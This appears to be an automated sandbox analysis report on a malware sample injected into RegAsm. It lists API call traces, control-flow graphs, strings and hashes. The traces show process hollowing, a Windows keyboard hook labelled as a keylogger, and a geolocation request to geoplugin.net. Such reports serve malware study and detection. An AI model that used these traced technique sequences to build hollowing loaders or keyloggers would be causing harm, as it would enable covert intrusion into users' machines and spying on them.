100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55977->55995 55979 10001fb8 55979->55974 55996 10004669 5 API calls _ValidateLocalCookies 55979->55996 55982 10002485 55981->55982 55998 10002933 IsProcessorFeaturePresent 55982->55998 55984 10002491 55999 100034ea 55984->55999 55986 10002496 55987 1000249a 55986->55987 56008 100053c8 55986->56008 55987->55966 55990 100024b1 55990->55966 55992->55972 55993->55975 55994->55977 55995->55979 55996->55974 55997->55971 55998->55984 56000 100034ef ___vcrt_initialize_winapi_thunks 55999->56000 56012 10003936 6 API calls 2 library calls 56000->56012 56002 100034f9 56003 100034fd 56002->56003 56013 100038e8 56002->56013 56003->55986 56005 10003505 56006 10003510 56005->56006 56021 10003972 RtlDeleteCriticalSection 56005->56021 56006->55986 56040 10007457 56008->56040 56011 10003529 7 API calls 3 library calls 56011->55987 56012->56002 56022 10003af1 56013->56022 56017 1000390b 56018 10003918 56017->56018 56028 1000391b 5 API calls ___vcrt_FlsFree 56017->56028 56018->56005 56020 100038fd 56020->56005 56021->56003 56029 10003a82 56022->56029 56024 10003b0b 56025 10003b24 TlsAlloc 56024->56025 56026 100038f2 56024->56026 56026->56020 56027 10003ba2 5 API calls try_get_function 56026->56027 56027->56017 56028->56020 56030 10003aaa 56029->56030 56032 10003aa6 __crt_fast_encode_pointer 56029->56032 56030->56032 56033 100039be 56030->56033 56032->56024 56035 100039cd try_get_first_available_module 56033->56035 56034 100039ea LoadLibraryExW 56034->56035 56036 10003a05 GetLastError 56034->56036 56035->56034 56037 10003a60 FreeLibrary 56035->56037 56038 10003a77 56035->56038 56039 10003a38 LoadLibraryExW 56035->56039 56036->56035 56037->56035 56038->56032 56039->56035 56043 10007470 56040->56043 56041 10002ada _ValidateLocalCookies 5 API calls 56042 100024a3 56041->56042 56042->55990 56042->56011 56043->56041 56044 10005bff 56052 10005d5c 56044->56052 56046 10005c13 56049 10005c1b 56050 10005c28 56049->56050 56060 10005c2b 10 API calls 56049->56060 56053 10005c45 _abort 4 API calls 56052->56053 56054 10005d83 56053->56054 56055 10005d9b TlsAlloc 56054->56055 56056 10005d8c 56054->56056 56055->56056 56057 10002ada _ValidateLocalCookies 5 API calls 56056->56057 56058 10005c09 56057->56058 56058->56046 56059 10005b7a 19 API calls 2 library calls 56058->56059 56059->56049 56060->56046

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                        • API String ID: 4236061018-3687161714
                                                                                                                                        • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                        • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                        • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                        • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                        • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                                                        • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                        • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                        • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                        • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                        • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                        • API String ID: 316982871-3035715614
                                                                                                                                        • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                        • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                        • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                        • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1666 40a2f3-40a30a 1667 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1666->1667 1668 40a36e-40a37e GetMessageA 1666->1668 1667->1668 1671 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1667->1671 1669 40a380-40a398 TranslateMessage DispatchMessageA 1668->1669 1670 40a39a 1668->1670 1669->1668 1669->1670 1672 40a39c-40a3a1 1670->1672 1671->1672
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • GetMessageA.USER32 ref: 0040A376
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                        Strings
                                                                                                                                        • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                        • String ID: Keylogger initialization failure: error
                                                                                                                                        • API String ID: 3219506041-952744263
                                                                                                                                        • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                        • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                        • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                        • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1748 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1755 10001177-1000119e lstrlenW FindFirstFileW 1748->1755 1756 10001168-10001172 lstrlenW 1748->1756 1757 100011a0-100011a8 1755->1757 1758 100011e1-100011e9 1755->1758 1756->1755 1759 100011c7-100011d8 FindNextFileW 1757->1759 1760 100011aa-100011c4 call 10001000 1757->1760 1759->1757 1762 100011da-100011db FindClose 1759->1762 1760->1759 1762->1758
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1083526818-0
                                                                                                                                        • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                        • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                        • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                        • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                          • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                          • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                        • String ID: 5.1.3 Pro$@0O$override$pth_unenc
                                                                                                                                        • API String ID: 2281282204-3705903726
                                                                                                                                        • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                        • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                        • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                        • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                        Strings
                                                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                                                        • API String ID: 3121278467-91888290
                                                                                                                                        • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                        • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                        • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                        • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                          • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                          • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                          • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3950776272-0
                                                                                                                                        • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                        • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                        • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                        • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,004F9F00), ref: 004338DA
                                                                                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1815803762-0
                                                                                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                        • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                        • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                        Strings
                                                                                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
